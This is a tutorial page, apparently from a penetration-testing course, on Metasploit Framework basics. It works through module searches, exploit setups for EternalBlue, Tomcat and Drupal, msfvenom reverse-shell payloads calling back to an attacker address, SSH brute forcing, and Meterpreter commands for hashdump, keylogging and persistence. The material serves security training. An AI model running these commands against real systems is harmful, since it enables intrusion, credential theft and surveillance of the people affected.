Metasploit Framework Basics

intermediate40 minWriteup

Getting started with the most popular exploitation framework

Learning Objectives

  • Navigate Metasploit interface
  • Search and select exploits
  • Configure exploit options
  • Use payloads and handlers

If

is the Swiss Army knife of network scanning, Metasploit is the entire toolbox - plus a robot that uses the tools for you. It's the world's most used penetration testing framework, containing thousands of exploits, payloads, and auxiliary modules.

Created by H.D. Moore in 2003 and now maintained by Rapid7, Metasploit transforms complex exploitation into a few simple commands. It's both loved (by pentesters) and feared (by defenders) because it makes attacking accessible to anyone.

Metasploit Editions

Metasploit Framework is free and open-source. Metasploit Pro is commercial with a GUI and extra features. We'll focus on the Framework - it's what you'll use in CTFs and most pentests.

Metasploit Architecture

  • Exploits: Code that takes advantage of vulnerabilities
  • Payloads: Code that runs after successful exploitation
  • Encoders: Obfuscate payloads to evade detection
  • Auxiliaries: Supporting modules (scanners, fuzzers, etc.)
  • Post: Post-exploitation modules
  • Nops: No-operation instructions for exploit stability

Think Like a Recipe

Exploit = the cooking technique, Payload = what you're making, Encoder = the secret ingredient that makes it undetectable. You need all three for a successful dish (compromise).

Getting Started

bash
1606070;"># Start the database (first time)
2sudo systemctl start postgresql
3sudo msfdb init
4 
5606070;"># Start Metasploit console
6msfconsole
7 
8606070;"># Update Metasploit
9sudo apt update && sudo apt install metasploit-framework

Essential Commands

bash
1606070;"># Help
2help
3?
4 
5606070;"># Search for modules
6search ms17-010
7search type:exploit platform:windows smb
8search cve:2021-44228
9 
10606070;"># Use a module
11use exploit/windows/smb/ms17_010_eternalblue
12 
13606070;"># Show module info
14info
15show options
16show payloads
17show targets
18 
19606070;"># Set options
20set RHOSTS 192.168.1.10
21set LHOST 192.168.1.5
22set PAYLOAD windows/x64/meterpreter/reverse_tcp
23 
24606070;"># Run the exploit
25exploit
26run
27 
28606070;"># Background a session
29background
30sessions -l    606070;"># List sessions
31sessions -i 1  606070;"># Interact with session 1
32 
33606070;"># Go back
34back
35exit

Understanding Payloads

Payload Types

  • Singles: Self-contained, one-shot payloads
  • Stagers: Small payloads that download the main payload
  • Stages: Downloaded by stagers, provides full functionality
1606070;"># Payload naming convention
2windows/meterpreter/reverse_tcp
3   |         |          |
4platform  payload    stager
5 
6606070;"># Stageless (single) - Note the underscore
7windows/meterpreter_reverse_tcp
8 
9606070;"># Staged - Note the slash
10windows/meterpreter/reverse_tcp

Common Payloads

bash
1606070;"># Reverse shell (victim connects back to you)
2windows/x64/meterpreter/reverse_tcp
3linux/x64/meterpreter/reverse_tcp
4cmd/unix/reverse_bash
5 
6606070;"># Bind shell (you connect to victim)
7windows/x64/meterpreter/bind_tcp
8linux/x64/shell/bind_tcp
9 
10606070;"># Simple command execution
11cmd/windows/powershell_reverse_tcp
12cmd/unix/reverse_python

Reverse vs Bind

Reverse: Victim connects to you (bypasses firewalls, preferred)
Bind: You connect to victim (often blocked by firewalls)

Meterpreter

Meterpreter is Metasploit's advanced payload. It runs entirely in memory (no files on disk), has encrypted communications, and provides powerful post-exploitation capabilities.

bash
1606070;"># System info
2meterpreter > sysinfo
3meterpreter > getuid
4meterpreter > getpid
5 
6606070;"># File system
7meterpreter > pwd
8meterpreter > ls
9meterpreter > cd C:\Users
10meterpreter > download secret.txt
11meterpreter > upload malware.exe
12meterpreter > cat file.txt
13 
14606070;"># Process management
15meterpreter > ps
16meterpreter > migrate 1234  606070;"># Migrate to process ID
17meterpreter > kill 1234
18 
19606070;"># Networking
20meterpreter > ipconfig
21meterpreter > route
22meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1
23 
24606070;"># Privilege escalation
25meterpreter > getsystem
26meterpreter > hashdump
27 
28606070;"># Screenshots and keylogging
29meterpreter > screenshot
30meterpreter > keyscan_start
31meterpreter > keyscan_dump
32 
33606070;"># Shell access
34meterpreter > shell  606070;"># Drop to system shell
35meterpreter > execute -f cmd.exe -i -H
36 
37606070;"># Persistence
38meterpreter > run persistence -h

Migrate for Stability

After getting a Meterpreter session, migrate to a stable process like explorer.exe or svchost.exe. If the original exploited process crashes, you keep your access.

Listeners and Handlers

bash
1606070;"># Set up a multi-handler (listener)
2use exploit/multi/handler
3set PAYLOAD windows/x64/meterpreter/reverse_tcp
4set LHOST 192.168.1.5
5set LPORT 4444
6exploit -j  606070;"># Run in background
7 
8606070;"># Generate standalone payload
9msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > shell.exe
10 
11606070;"># Payload formats
12msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
13msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
14msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.php
15msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.asp

Auxiliary Modules

Auxiliary modules do everything that isn't direct exploitation: scanning, brute forcing, sniffing, and more.

bash
1606070;"># SMB scanning
2use auxiliary/scanner/smb/smb_version
3set RHOSTS 192.168.1.0/24
4run
5 
6606070;"># Password brute forcing
7use auxiliary/scanner/ssh/ssh_login
8set RHOSTS 192.168.1.10
9set USERNAME admin
10set PASS_FILE /usr/share/wordlists/rockyou.txt
11run
12 
13606070;"># Web directory scanner
14use auxiliary/scanner/http/dir_scanner
15set RHOSTS 192.168.1.10
16run
17 
18606070;"># Port scanner
19use auxiliary/scanner/portscan/tcp
20set RHOSTS 192.168.1.0/24
21set PORTS 22,80,443,445,3389
22run

Common Exploits

EternalBlue (MS17-010)

bash
1use exploit/windows/smb/ms17_010_eternalblue
2set RHOSTS 192.168.1.10
3set PAYLOAD windows/x64/meterpreter/reverse_tcp
4set LHOST 192.168.1.5
5exploit

Tomcat Manager Upload

bash
1use exploit/multi/http/tomcat_mgr_upload
2set RHOSTS 192.168.1.10
3set RPORT 8080
4set HttpUsername admin
5set HttpPassword admin
6exploit

Drupalgeddon

bash
1use exploit/unix/webapp/drupal_drupalgeddon2
2set RHOSTS 192.168.1.10
3exploit

Know What You're Running

Always read module documentation with "info" before running exploits. Some exploits crash services, cause data loss, or are unreliable.

Using the Database

bash
1606070;"># Check database status
2db_status
3 
4606070;"># Create workspace
5workspace -a project_name
6workspace project_name
7 
8606070;"># Import Nmap scan
9db_import /path/to/nmap_scan.xml
10 
11606070;"># View data
12hosts
13services
14vulns
15creds
16 
17606070;"># Search services
18services -p 445
19services -S open
20 
21606070;"># Auto-exploit based on scan
22db_autopwn (deprecated)
23606070;"># Instead, use analyze
24analyze

Metasploit Methodology

Metasploit Exploitation Flow

1
ReconImport or run scans to identify targets
2
SearchFind relevant exploits for discovered services
3
ConfigureSet RHOSTS, LHOST, payload options
4
ValidateUse "check" command if available
5
ExploitRun the exploit
6
StabilizeMigrate meterpreter to stable process
7
Post-ExploitRun post modules, gather data

Knowledge Check

Quick Quiz
Question 1 of 3

What is the difference between a staged and stageless payload?

Challenges

Your First Exploit

Challenge
🌱 beginner

Find a vulnerable Windows machine running SMB, exploit it with EternalBlue, and retrieve the flag from C:\\flag.txt

Need a hint? (4 available)

Create a Payload

Challenge
🔥 intermediate

Generate an executable payload with msfvenom, set up a handler, and get a meterpreter session when the payload is executed.

Need a hint? (4 available)

Key Takeaways

  • Metasploit Framework is free and contains thousands of exploits
  • Exploits + Payloads + Handlers = successful compromise
  • Meterpreter is the preferred payload - runs in memory
  • Reverse shells are preferred over bind shells for firewall bypass
  • Always migrate meterpreter to a stable process
  • Use auxiliary modules for scanning and brute forcing
  • The database feature integrates Nmap scans for organization